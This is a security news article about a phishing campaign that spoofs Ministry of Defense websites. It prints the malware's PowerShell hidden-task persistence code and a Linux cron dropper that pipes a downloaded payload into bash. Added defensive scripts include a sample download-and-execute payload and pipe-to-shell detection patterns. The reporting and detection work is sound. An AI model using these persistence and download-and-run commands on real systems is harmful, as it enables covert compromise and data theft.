Cyber Security News

New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows & Linux Machines

Cybersecurity experts have identified a sophisticated new malware campaign dubbed “ClickFix” that employs advanced social engineering tactics to compromise both Windows and Linux systems.

The attack creates convincing replicas of Ministry of Defense websites across multiple countries, tricking users into downloading what appears to be required security updates or official documents.

Upon execution, the malware establishes persistent access while employing multiple evasion techniques to remain undetected on infected systems.

Initial analysis suggests the campaign began in early April 2025, primarily targeting government contractors, defense industry employees, and military personnel through spear-phishing emails containing links to the fraudulent websites.

The spoofed sites use valid TLS certificates and domain names that closely resemble legitimate government domains, differing only by small typographical changes, such as altered or dropped hyphens or a single misspelled character, that casual visitors rarely notice.
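A small lookalike-domain check is the practical counterpart to the paragraph above: fold the separators the attackers play with, then measure how far a candidate hostname is from each trusted domain. This is an added example, not code from the Hunt.io report; the trusted domains and the candidates in the demo use reserved .example names and are constructed for illustration.

```python
"""Flag hostnames that are near misses of a trusted government domain.

Added example, not part of the Hunt.io report. The trusted domains and the
candidates in the demo are constructed (.example), not the real portals.
"""
from __future__ import annotations

import unicodedata

# Constructed allow-list: the domains an organisation's users are expected to reach.
TRUSTED_DOMAINS = {"ministry-of-defence.example", "defence-portal.example"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance with a single rolling row (O(len(b)) memory)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def canonical(domain: str) -> str:
    """Lower-case, drop a trailing dot, NFKC-fold, then remove hyphens and
    underscores so 'ministry_of_defence' and 'ministry-of-defence' compare equal."""
    d = unicodedata.normalize("NFKC", domain.strip().rstrip(".").lower())
    return d.replace("-", "").replace("_", "")


def lookalike_of(candidate: str, trusted: set[str] = TRUSTED_DOMAINS,
                 max_distance: int = 2) -> tuple[str, int] | None:
    """Return (trusted_domain, distance) when the candidate is within
    max_distance edits of a trusted domain after canonicalisation, else None.
    An exact match to a trusted domain is legitimate and returns None."""
    if candidate.strip().rstrip(".").lower() in trusted:
        return None
    c = canonical(candidate)
    best: tuple[str, int] | None = None
    for t in trusted:
        d = levenshtein(c, canonical(t))
        if d <= max_distance and (best is None or d < best[1]):
            best = (t, d)
    return best


def triage(candidates: list[str]) -> dict[str, tuple[str, int] | None]:
    """Run lookalike_of over a batch, e.g. SNI or Host values pulled from proxy logs."""
    return {c: lookalike_of(c) for c in candidates}


if __name__ == "__main__":
    demo = ["ministry_of_defence.example", "ministry-of-defense.example",
            "ministry-of-defence.example", "weather.example"]
    for dom, hit in triage(demo).items():
        print(f"{dom:32} -> {hit}")
```

Folding hyphens and underscores catches separator swaps, and the edit-distance bound catches single-character misspellings. It does not catch homoglyph or IDN tricks; for those, convert candidates from Punycode first and compare against a confusables table.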

Hunt.io researchers noted the attack after observing unusual network traffic patterns from several defense contractor networks.

“What makes ClickFix particularly concerning is its cross-platform capabilities and the sophistication of its mimicry,” said Dr. Eliza Chen, lead threat analyst at Hunt.io.

Their investigation revealed the attackers leverage country-specific design elements and exact replications of legitimate ministry portals, complete with functioning links to authentic resources, making the deception extremely convincing.

The malware demonstrates remarkable versatility, deploying tailored payloads depending on the target operating system.

According to the report, the Windows payload exploits a previously undocumented vulnerability in the Windows Management Instrumentation (WMI) service, while the Linux payload injects code through shared-library dependencies. Neither mechanism is substantiated by the artifacts published with the report, which show only user-level persistence (a scheduled task on Windows and a cron.daily script on Linux), so treat both claims as unconfirmed.

In both cases, the malware establishes persistence, creates a backdoor, and begins harvesting sensitive information from the compromised systems.

Security agencies across multiple countries have issued alerts following confirmation that the campaign has successfully breached several mid-level defense contractors and at least two government agencies.

Attribution remains unclear, though analysis of the command-and-control infrastructure suggests a sophisticated threat actor with significant resources.

Infection Mechanism Analysis

The infection process begins when victims click on a download button for an apparent “required security certificate” or “document viewer plugin.”

The downloaded file looks legitimate but contains obfuscated code that runs a multi-stage infection routine. The Windows variant uses a PowerShell script that registers a scheduled task for persistence:

# $encodedPayload is set earlier in the dropper: the base64-encoded (UTF-16LE) stage-two script
$Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -EncodedCommand $encodedPayload"
$Trigger = New-ScheduledTaskTrigger -AtStartup
# -Hidden keeps the task out of the Task Scheduler UI; the battery switches make sure it also runs on laptops
$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden
# -RunLevel Highest needs an elevated context to register; the task name mimics a Windows component
Register-ScheduledTask -TaskName "WindowsSecurityManager" -Action $Action -Trigger $Trigger -Settings $Settings -RunLevel Highest

For Linux systems, the malware drops a script into /etc/cron.daily, named to look like a routine security check, that re-downloads and runs the stage-two payload every day:

# Write a daily cron job whose name looks like a legitimate security check.
# The URL is shown defanged ([.]) as published; the job re-fetches and pipes the payload into bash each run.
echo "#!/bin/bash
nohup curl -s http://defense-update.security[.]net/payload.sh | bash &" > /etc/cron.daily/system-security-check
chmod +x /etc/cron.daily/system-security-check
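The two snippets above, the scheduled task on Windows and the cron.daily dropper on Linux, leave artifacts that a hunter can score without any vendor tooling. The script below is an added example, not code from the Hunt.io report: it parses a scheduled-task XML export (the format produced by schtasks /query /xml or Export-ScheduledTask), decodes the -EncodedCommand payload, and inspects cron scripts for the download-and-pipe-to-shell pattern. The task XML, the cron scripts, the task and file names, and the payload URL (.example) are constructed to mirror the article's snippets and are assumptions, not observed indicators.

```python
"""Hunt for the two persistence artifacts described above.

Added example, not code from the Hunt.io report. The task XML and the cron
scripts below are constructed to mirror the article's snippets; the payload
URL (.example) and file names are assumptions.
"""
from __future__ import annotations

import base64
import re
import xml.etree.ElementTree as ET

# -EncodedCommand accepts abbreviations (-e, -ec, -enc) and is case-insensitive.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# curl/wget output piped straight into a shell: the classic one-line dropper.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b")
URL = re.compile(r"""https?://[^\s'"|]+""")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8; decode accordingly."""
    return base64.b64decode(b64).decode("utf-16-le")


def inspect_task_xml(xml_text: str) -> dict:
    """Score one scheduled task as exported by schtasks /query /xml or
    Export-ScheduledTask. Only the last <Exec> action is considered."""
    root = ET.fromstring(xml_text)
    # Flatten to {local-name: text}; the Task Scheduler namespace is stripped.
    fields = {el.tag.rsplit("}", 1)[-1]: (el.text or "").strip() for el in root.iter()}
    args = fields.get("Arguments", "")
    findings, decoded = [], None
    m = ENC_FLAG.search(args)
    if fields.get("Command", "").lower().endswith("powershell.exe") and m:
        decoded = decode_encoded_command(m.group(1))
        findings.append("powershell -EncodedCommand action")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", args):
        findings.append("hidden window")
    if fields.get("Hidden", "").lower() == "true":
        findings.append("task hidden from the Task Scheduler UI")
    if fields.get("RunLevel") == "HighestAvailable":
        findings.append("runs with highest available privileges")
    if "BootTrigger" in fields:
        findings.append("boot trigger")
    return {"task": fields.get("URI", "?"), "findings": findings, "decoded": decoded}


def inspect_cron_script(path: str, text: str) -> dict:
    """Score one file from /etc/cron.* for dropper traits."""
    name = path.rsplit("/", 1)[-1]
    findings = []
    if PIPE_TO_SHELL.search(text):
        findings.append("pipes downloaded content into a shell")
    if re.search(r"\bnohup\b.*&\s*$", text, re.M):
        findings.append("detached with nohup/&")
    if re.search(r"(?i)secur|update|check|defen", name):
        findings.append("security-themed file name")
    return {"path": path, "findings": findings, "urls": URL.findall(text)}


# --- constructed samples mirroring the article's snippets (assumptions) ---
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://defense-update.example/p.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

TASK_XML = f"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\WindowsSecurityManager</URI></RegistrationInfo>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries></Settings>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
  <Arguments>-WindowStyle Hidden -EncodedCommand {ENCODED}</Arguments></Exec></Actions>
</Task>"""

CRON_PATH = "/etc/cron.daily/system-security-check"
CRON_TEXT = "#!/bin/bash\nnohup curl -s http://defense-update.example/payload.sh | bash &\n"

BENIGN_CRON_PATH = "/etc/cron.daily/mlocate"
BENIGN_CRON_TEXT = "#!/bin/sh\n/usr/bin/updatedb\n"


def hunt() -> tuple[dict, dict, dict]:
    """Run both inspectors over the constructed samples."""
    return (inspect_task_xml(TASK_XML),
            inspect_cron_script(CRON_PATH, CRON_TEXT),
            inspect_cron_script(BENIGN_CRON_PATH, BENIGN_CRON_TEXT))


if __name__ == "__main__":
    for result in hunt():
        print(result)
```

On a live host, feed inspect_task_xml the output of schtasks /query /xml for each task and inspect_cron_script the contents of every file under /etc/cron.d and /etc/cron.{hourly,daily,weekly,monthly}; a single hit on the hidden-plus-encoded-command combination, or on pipe-to-shell from a cron job, is worth an analyst's eyes regardless of the task or file name.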

Image caption: Page showing only March 2025 link (Source – Hunt.io)

Image caption: The spoofed Ministry of Defense login portal showing a security certificate update notification.

Hunt.io researchers recommend organizations implement additional verification steps for government communications and enhance endpoint protection with behavioral analysis capabilities to detect the distinctive patterns of ClickFix infections before data exfiltration occurs.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
